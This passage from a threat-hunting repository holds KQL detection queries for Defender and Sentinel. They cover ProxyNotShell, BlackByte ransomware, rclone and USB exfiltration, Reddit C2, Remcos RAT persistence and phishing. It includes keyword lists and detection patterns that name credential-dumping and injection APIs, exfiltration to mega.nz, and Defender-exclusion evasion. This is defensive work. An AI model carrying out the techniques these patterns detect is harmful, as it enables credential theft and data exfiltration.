,"DefineField" 35 | ,"DefineLiteral" 36 | ,"DefinePInvokeMethod" 37 | ,"DefineType" 38 | ,"DeflateStream" 39 | ,"DeviceIoControl" 40 | ,"DllImport" 41 | ,"DuplicateTokenEx" 42 | ,"Emit" 43 | ,"EncodedCommand" 44 | ,"EnumerateSecurityPackages" 45 | ,"ExpandString" 46 | ,"FreeHGlobal" 47 | ,"FreeLibrary" 48 | ,"FromBase64String" 49 | ,"GetAssemblies" 50 | ,"GetAsyncKeyState" 51 | ,"GetConstructor" 52 | ,"GetConstructors" 53 | ,"GetDefaultMembers" 54 | ,"GetDelegateForFunctionPointer" 55 | ,"GetEvent" 56 | ,"GetEvents" 57 | ,"GetField" 58 | ,"GetFields" 59 | ,"GetForegroundWindow" 60 | ,"GetInterface" 61 | ,"GetInterfaceMap" 62 | ,"GetInterfaces" 63 | ,"GetKeyboardState" 64 | ,"GetLogonSessionData" 65 | ,"GetMember" 66 | ,"GetMembers" 67 | ,"GetMethod" 68 | ,"GetMethods" 69 | ,"GetModuleHandle" 70 | ,"GetNestedType" 71 | ,"GetNestedTypes" 72 | ,"GetPowerShell" 73 | ,"GetProcAddress" 74 | ,"GetProcessHandle" 75 | ,"GetProperties" 76 | ,"GetProperty" 77 | ,"GetTokenInformation" 78 | ,"GetTypes" 79 | ,"ILGenerator" 80 | ,"ImpersonateLoggedOnUser" 81 | ,"InteropServices" 82 | ,"IntPtr" 83 | ,"InvokeMember" 84 | ,"kernel32" 85 | ,"LoadLibrary" 86 | ,"LogPipelineExecutionDetails" 87 | ,"MakeArrayType" 88 | ,"MakeByRefType" 89 | ,"MakeGenericType" 90 | ,"MakePointerType" 91 | ,"Marshal" 92 | ,"memcpy" 93 | ,"MemoryStream" 94 | ,"Methods" 95 | ,"MiniDumpWriteDump" 96 | ,"NonPublic" 97 | ,"OpenDesktop" 98 | ,"OpenProcess" 99 | ,"OpenProcessToken" 100 | ,"OpenThreadToken" 101 | ,"OpenWindowStation" 102 | ,"PasswordDeriveBytes" 103 | ,"Properties" 104 | ,"ProtectedEventLogging" 105 | ,"PtrToString" 106 | ,"PtrToStructure" 107 | ,"ReadProcessMemory" 108 | ,"ReflectedType" 109 | ,"RevertToSelf" 110 | ,"RijndaelManaged" 111 | ,"ScriptBlockLogging" 112 | ,"SetInformationProcess" 113 | ,"SetThreadToken" 114 | ,"SHA1Managed" 115 | ,"StructureToPtr" 116 | ,"ToBase64String" 117 | ,"TransformFinalBlock" 118 | ,"TypeHandle" 119 | ,"TypeInitializer" 120 | ,"UnderlyingSystemType" 121 | 
,"UnverifiableCodeAttribute" 122 | ,"VirtualAlloc" 123 | ,"VirtualFree" 124 | ,"VirtualProtect" 125 | ,"WriteByte" 126 | ,"WriteInt32" 127 | ,"WriteProcessMemory" 128 | ,"ZeroFreeGlobalAllocUnicode"]; 129 | let excludedProcess = datatable(name:string)[@'exclusion1','exclusion2']; 130 | let excludedCommandLines = datatable(name:string)[@'exclusion1',@'exclusion2']; 131 | DeviceProcessEvents 132 | | where ( InitiatingProcessCommandLine has_any (dirtyWordList) or ProcessCommandLine has_any (dirtyWordList) ) 133 | | where not ( FileName has_any (excludedProcess) or InitiatingProcessFileName has_any (excludedProcess) or InitiatingProcessParentFileName has_any (excludedProcess) ) or ( InitiatingProcessCommandLine has_any (excludedCommandLines) or ProcessCommandLine has_any (excludedCommandLines) ) 134 | ``` 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /proxy_shell_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # ProxyNotShell exploitation of Exchange servers 2 | # Source: //https://redcanary.com/blog/intelligence-insights-january-2023/ 3 | 4 | //Rundll32 executing DLL files located in the Windows Temp directory 5 | //The following detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 6 | let trustedDlls = datatable(dll:string)["trustedDll.dll"]; //place trusted DLLs that launch from temp folders here. 
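7 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 8 | DeviceProcessEvents 9 | | where ((FileName =~ "rundll32.exe" and ProcessCommandLine contains @"windows\temp") or (InitiatingProcessFileName =~ "rundll32.exe" and InitiatingProcessCommandLine contains @"windows\temp")) and not(InitiatingProcessCommandLine has_any (trustedDlls) or ProcessCommandLine has_any (trustedDlls)) // each clause pairs rundll32 with its OWN command line (the DLL path lives there): first the rundll32 launch itself, then anything it spawns 10 | 11 | //Look for web shell files named iisstart.aspx and logout.aspx being written to inetpub\wwwroot\aspnet_client and exchange server\v15\frontend\httpproxy\ecp\auth 12 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 13 | DeviceFileEvents 14 | | where ActionType =~ "FileCreated" and FileName has_any ("iisstart.aspx","logout.aspx") and FolderPath has_any (@"inetpub\wwwroot\aspnet_client",@"server\v15\frontend\httpproxy\ecp\auth") // file names match the description above (iisstart.aspx, not .exe) 15 | 16 | //Activity initiated from w3wp.exe with a command line containing MSExchangePowerShellAppPool. Based on Red Canary testing, the activity we saw, and other researchers’ observations, malicious activity spawning from a w3wp.exe process with this command line is an indicator of potential ProxyNotShell exploitation. 17 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 18 | DeviceProcessEvents 19 | | where InitiatingProcessFileName =~ "w3wp.exe" and InitiatingProcessCommandLine contains "MSExchangePowerShellAppPool" 20 | 21 | //We observed execution of Visual Basic Scripts (.vbs) from the windows\temp folder writing a malicious Meterpreter executable and subsequently making network connections. The executable’s internal file name, ab.exe, is the default metadata used by Meterpreter for its payloads. 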
22 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 23 | DeviceFileEvents 24 | | where InitiatingProcessFileName endswith ".vbs" and InitiatingProcessFolderPath contains @"windows\temp" and FileName matches regex "[a-zA-Z]{2}\\.exe" 25 | -------------------------------------------------------------------------------- /raas_blackbyte.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Blackbyte Hunt Rules 3 | 4 | # Description 5 | 6 | 7 | # Source 8 | https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/ 9 | 10 | # MITRE ATT&CK 11 | - T1505.003: Server Software Component: Web Shell 12 | - T1490: Inhibit System Recovery 13 | - T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 | - T1537: Transfer Data to Cloud Account 15 | 16 | ## ProxyShell web shell creation events 17 | 18 | ``` 19 | DeviceProcessEvents 20 | | where ProcessCommandLine has_any ("ExcludeDumpster","New-ExchangeCertificate") and ProcessCommandLine has_any ("-RequestFile","-FilePath") 21 | ``` 22 | 23 | ## Suspicious vssadmin events 24 | 25 | ``` 26 | DeviceProcessEvents 27 | | where ProcessCommandLine has_any ("vssadmin","vssadmin.exe") and ProcessCommandLine has "Resize ShadowStorage" and ProcessCommandLine has_any ("MaxSize=401MB"," MaxSize=UNBOUNDED") 28 | ``` 29 | 30 | ## Detection for persistence creation using Registry Run keys 31 | 32 | ``` 33 | DeviceRegistryEvents 34 | | where ActionType == "RegistryValueSet" 35 | | where (RegistryKey has @"Microsoft\Windows\CurrentVersion\RunOnce" and RegistryValueName == "MsEdgeMsE") 36 | or (RegistryKey has @"Microsoft\Windows\CurrentVersion\RunOnceEx" and RegistryValueName == "MsEdgeMsE") 37 | or (RegistryKey has @"Microsoft\Windows\CurrentVersion\Run" and RegistryValueName == "MsEdgeMsE") 38 | | where RegistryValueData startswith @"rundll32" 39 | | where RegistryValueData endswith 
@".dll,Default" 40 | | project Timestamp,DeviceId,DeviceName,ActionType,RegistryKey,RegistryValueName,RegistryValueData 41 | ``` 42 | 43 | ## Exfiltration 44 | 45 | ``` 46 | //suitable for hunting exfiltration to mega.nz 47 | DeviceNetworkEvents 48 | | where RemoteUrl contains "g.api.mega.co.nz" 49 | ``` 50 | 51 | ## Microsoft Defender for Endpoint 52 | 53 | The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity. 54 | 55 | ‘CVE-2021-31207’ exploit malware was detected 56 | An active ‘NetShDisableFireWall’ malware in a command line was prevented from executing. 57 | Suspicious registry modification. 58 | ‘Rtcore64’ hacktool was detected 59 | Possible ongoing hands-on-keyboard activity (Cobalt Strike) 60 | A file or network connection related to a ransomware-linked emerging threat activity group detected 61 | Suspicious sequence of exploration activities 62 | A process was injected with potentially malicious code 63 | Suspicious behavior by cmd.exe was observed 64 | ‘Blackbyte’ ransomware was detected 65 | -------------------------------------------------------------------------------- /rclone_detection.md: -------------------------------------------------------------------------------- 1 | # Detect use of RClone to compress and exfiltrate data 2 | 3 | ``` 4 | let Rclone_Commands = dynamic(["pass","user","copy","mega","sync","config","lsd","remote","ls"]); 5 |     DeviceProcessEvents 6 |     | where FileName contains "rclone" 7 |     | where ProcessCommandLine has_any (Rclone_Commands) 8 | ``` 9 | -------------------------------------------------------------------------------- /redditC2.md: -------------------------------------------------------------------------------- 1 | # Reddit used for C2 2 | 3 | # SIGMA rule: 4 | https://github.com/m4nbat/sigma/blob/master/rules/windows/network_connection/net_connection_win_reddit_api_non_browser_access.yml 5 | 6 | # Kusto 
7 | `//Processes interacting with Reddit API (Has been known to be used for C2 communication) 8 | // https://github.com/kleiton0x00/RedditC2 9 | //false positives - browsers going to the URL. Or a legitimate application that uses Reddit API 10 | let browserNames = datatable (browser:string)["msedge.exe","chrome.exe","iexplorer.exe","brave.exe","firefox.exe"]; //add more broswers where needed for exclusion 11 | DeviceNetworkEvents 12 | | where not(InitiatingProcessFileName has_any (browserNames)) and RemoteUrl contains "reddit.com/api/"` 13 | -------------------------------------------------------------------------------- /registry_run_key_persistence.md: -------------------------------------------------------------------------------- 1 | # Forensics on Standard Registry Run keys in Windows. Registry Run keys can be used to establish persistence on a device. 2 | 3 | ## Source: 4 | https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/edit/main/DFIR/DFE%20-%20Registry-Run-Keys-Forensics.md 5 | 6 | ---- 7 | ### Defender For Endpoint 8 | 9 | ``` 10 | let RegistryRunKeys = dynamic 11 | ([@"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", 12 | @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce", 13 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", 14 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"]); 15 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 16 | let SearchWindow = 7d; //Customizable h = hours, d = days 17 | DeviceRegistryEvents 18 | | where Timestamp > ago(SearchWindow) 19 | | where DeviceName has_any (CompromisedDevices) 20 | | where RegistryKey has_any (RegistryRunKeys) 21 | | extend RegistryChangeInfo = bag_pack("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 22 | | summarize TotalRunKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 23 | ``` 24 | ### 
Sentinel 25 | ``` 26 | let RegistryRunKeys = dynamic 27 | ([@"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", 28 | @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce", 29 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", 30 | @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" 31 | ]); 32 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 33 | let SearchWindow = 7d; //Customizable h = hours, d = days 34 | DeviceRegistryEvents 35 | | where TimeGenerated > ago(SearchWindow) 36 | | where DeviceName has_any (CompromisedDevices) 37 | | where RegistryKey has_any (RegistryRunKeys) 38 | | extend RegistryChangeInfo = pack_dictionary("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 39 | | summarize TotalRunKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 40 | ``` 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /remcos_rat_kusto_queries_09032023.md: -------------------------------------------------------------------------------- 1 | # Remcos RAT Hunt Queries 2 | 3 | **Source:** https://www.sentinelone.com/blog/dbatloader-and-remcos-rat-sweep-eastern-europe/ 4 | 5 | `//Addition of mock trusted directories to attempt to bypass user account control 6 | //https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/ 7 | DeviceProcessEvents 8 | | where ProcessCommandLine endswith @"mkdir \\?\C:\Windows " or ProcessCommandLine endswith @"mkdir \\?\C:\Windows \System32"` 9 | 10 | `//Deletion of mock trusted directories as part of cleanup 11 | DeviceProcessEvents 12 | | where ProcessCommandLine has_all ("del","/q",@"C:\Windows \System32") or ProcessCommandLine has_all ('rmdir',@"C:\Windows \System32") or ProcessCommandLine has_all ('rmdir',@"C:\Windows \")`  13 | 14 | `//Detection of files 
created in the above folder possibly dropped by the DBATLoader 15 | DeviceFileEvents 16 | | where ActionType =~ "FileCreated" and FileName has_any (".bat",".exe",".dll") and (FolderPath startswith @"C:\Windows \System32" or FolderPath startswith @"C:\Windows \")` 17 | 18 | `//Detection of PowerShell defese evasion via Micrososft Defender exclusions 19 | DeviceProcessEvents 20 | | where ProcessCommandLine has_all ("-WindowStyle","Hidden","-Command","Add-MpPreference","-ExclusionPath",@"C:\Users")`  21 | 22 | `// Hunt for registry run key being created for persistence when hunting for DBatLoader as part of Remcos RAT campaign 23 | DeviceRegistryEvents 24 | | where ActionType =~ "RegistryValueSet" and RegistryKey =~ @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"` 25 | -------------------------------------------------------------------------------- /scheduled_task_peristence_from_roaming_folder.md: -------------------------------------------------------------------------------- 1 | # Source: https://redcanary.com/blog/intelligence-insights-february-2023/ 2 | 3 | # Scheduled task persistence from the roaming folder with no command-line arguments 4 | `//Scheduled task persistence from the roaming folder with no command-line arguments 5 | //The following detection analytic looks for scheduled tasks executing from the Users folder. Tasks executing with no command-line arguments are more likely to be malicious. To reduce noise, you will likely need to create exceptions for any approved applications in your environment that have this behavior. 
6 | DeviceProcessEvents 7 | | where FileName has_any ("taskeng.exe","svchost.exe") and FolderPath has_all ("users","appdata\\roaming") and isempty(ProcessCommandLine)` 8 | -------------------------------------------------------------------------------- /tampering_with_windows_event_log.md: -------------------------------------------------------------------------------- 1 | # Tampering with the Windows event log 2 | 3 | source: https://www.linkedin.com/feed/update/urn:li:activity:7038997228815867904/?lipi=urn%3Ali%3Apage%3Ad_flagship3_profile_view_base_recent_activity_details_all%3B6gVrKrP2R1exxyyHSPCOjg%3D%3D 4 | 5 | ## MDE DeviceRegistryEvents Table Detection 6 | `//Detect possible tampering with the Windows event log registry keys 7 | DeviceRegistryEvents 8 | | where InitiatingProcessCommandLine has @"powershell.exe" 9 | | where ActionType == @"RegistryValueSet" 10 | | where RegistryKey startswith @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\" and RegistryValueData endswith ".dll"` 11 | 12 | ## Windows Event IDs 13 | `//Detect possible tampering with the Windows event log registry keys 14 | SecurityEvent 15 | | where EventID in (1108,1107)` 16 | -------------------------------------------------------------------------------- /test.bat: -------------------------------------------------------------------------------- 1 | test 2 | -------------------------------------------------------------------------------- /test.csv: -------------------------------------------------------------------------------- 1 | T1098 2 | T1197 3 | T1547 4 | T1037 5 | T1176 6 | T1554 7 | T1136 8 | T1543 9 | T1546 10 | T1133 11 | T1574 12 | T1525 13 | T1556 14 | T1137 15 | T1653 16 | T1542 17 | T1053 18 | T1505 19 | T1205 20 | T1078 21 | -------------------------------------------------------------------------------- /ttp_initialaccess_phishing_zip_domains.md: -------------------------------------------------------------------------------- 1 | # Title 2 | 
Phishing abusing .ZIP domains 3 | 4 | # Description 5 | 6 | 7 | # MITRE ATT&CK 8 | - Initial Access 9 | - Phishing: Malicious Link 10 | 11 | # Source 12 | - Steven Lim 13 | - 14 | https://www.linkedin.com/pulse/defending-against-zip-domain-phishing-attack-microsoft-steven-lim?utm_source=share&utm_medium=member_android&utm_campaign=share_via 15 | 16 | # Query 17 | 18 | ## MDE or Sentinel 19 | 20 | ``` 21 | EmailUrlInfo 22 | | where Timestamp > ago(1h) 23 | | where UrlDomain endswith ".zip" 24 | | where Url contains "@" 25 | | join EmailEvents on $left.NetworkMessageId == $right.NetworkMessageId 26 | | project Timestamp, NetworkMessageId, SenderFromAddress, RecipientEmailAddress, Subject, Url, UrlDomain, ThreatTypes, EmailAction, ReportId 27 | 28 | ``` 29 | 30 | ## MDE or Sentinel - Unicode Abuse 31 | 32 | ``` 33 | 34 | EmailUrlInfo 35 | | where Timestamp > ago(1h) 36 | | where UrlDomain endswith ".zip" and Url contains "%E2%88%95" or Url contains "%E2%81%84" and Url contains "@" 37 | | join EmailEvents on $left.NetworkMessageId == $right.NetworkMessageId 38 | | project Timestamp, NetworkMessageId, SenderFromAddress, RecipientEmailAddress, Subject, Url, UrlDomain, ThreatTypes, EmailAction, ReportId 39 | 40 | ``` 41 | -------------------------------------------------------------------------------- /ttp_initialaccess_teamPhishing.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Possible MS Teams phishing attempt 3 | 4 | # Description 5 | 6 | # MITRE ATT&CK 7 | 8 | - Initial Access 9 | - Phishing: Malicious Attachment 10 | - Phishing: Malicious Link 11 | 12 | # Source 13 | - Steven Lim 14 | - https://www.linkedin.com/pulse/defending-against-zip-domain-phishing-attack-microsoft-steven-lim?utm_source=share&utm_medium=member_android&utm_campaign=share_via 15 | 16 | # Query 17 | 18 | ``` 19 | OfficeActivity 20 | | where TimeGenerated > ago(1h) 21 | | where RecordType =~ 'MicrosoftTeams' 22 | | where Operation == 
"MessageCreatedHasLink" 23 | | where CommunicationType == "OneOnOne" or CommunicationType == "GroupChat" 24 | | where UserId !endswith "your_corporate_domain_1"     // Filter off all internal teams user 1-to-1 message 25 | and UserId !endswith "your_corporate_domain_2" 26 | and UserId !endswith "your_corporate_domain_3" 27 | | extend UserDomains = tostring(split(UserId, '@')[1]) 28 | | extend UserIPs = tostring(split(ClientIP, '::ffff:')[1]) 29 | | where UserIPs != "" 30 | | distinct UserIPs 31 | | join ThreatIntelligenceIndicator on $left.UserIPs == $right.NetworkIP 32 | ``` 33 | -------------------------------------------------------------------------------- /ttp_pythonexecuted_from_pythonsetupfile.md: -------------------------------------------------------------------------------- 1 | # Name: 2 | Execution of python scripts via python installer binary 3 | 4 | # Description: 5 | 6 | 7 | # Source: 8 | @kostatsale 9 | 10 | # MITRE ATT&CK 11 | - Defense Evasion 12 | - T1202 13 | 14 | # Query for MDE or Sentinel 15 | 16 | ``` 17 | DeviceProcessEvents 18 | | where InitiatingProcessParentFileName has_any "setup.exe" and InitiatingProcessFileName =~ "pythonw.exe" and InitiatingProcessCommandLine has_all (@"\AppData\",".py") 19 | ``` 20 | -------------------------------------------------------------------------------- /ttp_usb_exfiltration. 
md: -------------------------------------------------------------------------------- 1 | # * Possible Exfiltration via USB Detection* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------------|-------------------------------------------------------| 9 | | T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB| [Exfiltration Over Physical Medium: Exfiltration over USB](https://attack.mitre.org/techniques/T1052/001) | 10 | 11 | #### Description 12 | Adversaries such as insiders have been known to exfilrate data via removable media such as USB devices. 13 | 14 | #### Risk 15 | Removable media including USB can present a data loss risk to organisations. 16 | 17 | #### Author 18 | - **Name:** Nathan Webb 19 | - **Github:** 20 | - **Twitter:** 21 | - **LinkedIn:** [https://www.linkedin.com/in/nathanjohnwebb](htps://www.linkedin.com/in/nathanjohnwebb) 22 | - **Website:** 23 | 24 | #### References 25 | - [Threat hunt] Detecting Possible USB Data Exfiltration 26 | https://www.linkedin.com/pulse/threat-hunt-detecting-possible-usb-data-exfiltration-nathan-webb-t3ode?utm_source=share&utm_medium=member_android&utm_campaign=share_via 27 | 28 | ## Defender For Endpoint 29 | 30 | ```KQL 31 | let LookBackPeriod=14d; // How long to look back for USB activity 32 | let DetectionPeriod=1d; 33 | let DeviceConnectedCopiedWindow=1h; // adjust to have a longer time range between device connected and files copied 34 | let SystemDrive=dynamic(['C:', 'D:']); // add known system drive paths in here 35 | DeviceEvents 36 | | where Timestamp > ago(LookBackPeriod) 37 | | where ActionType contains "PnpDeviceConnected" 38 | | extend DeviceType = tostring(todynamic(AdditionalFields).ClassName) 39 | | extend UsbId = tostring(todynamic(AdditionalFields).DeviceId) 40 | | where DeviceType contains "drive" or DeviceType contains "disk" 41 | // get a count of how many times that USB vendor 
and id has been inserted (this just identifies the type of device and is not a unique ID per USB device) 42 | // bin our timestamp so we can join on this time window when searching for USB events 43 | | summarize FirstSeen=min(Timestamp), TimesDriveConnected=count() by UsbId, bin(Timestamp, DeviceConnectedCopiedWindow), DeviceId, DeviceName 44 | | where FirstSeen > ago(DetectionPeriod) 45 | // do a join to get copied files from the host that occur within the same timeeframe 46 | | join (DeviceFileEvents 47 | | where Timestamp > ago(DetectionPeriod) 48 | | where ActionType == "FileCreated" 49 | | where FileOriginReferrerUrl contains @"\" // file has come from a windows path 50 | | extend SourceDrive=tostring(split(FileOriginReferrerUrl, @"\")[0]) // get the drive letter of the system path 51 | | extend DestDrive=tostring(split(FolderPath, @"\")[0]) // get the drive letter of where the file was written to 52 | | where SourceDrive has_any (SystemDrive) and not(DestDrive has_any (SystemDrive)) // a copy off the system drive 53 | | summarize FilesPathsCopied=make_set(FolderPath, 1000), FileCopiesCount=count() by SourceDrive, DestDrive, DeviceId, DeviceName, bin(Timestamp, DeviceConnectedCopiedWindow)) 54 | on DeviceId, Timestamp 55 | ``` --------------------------------------------------------------------------------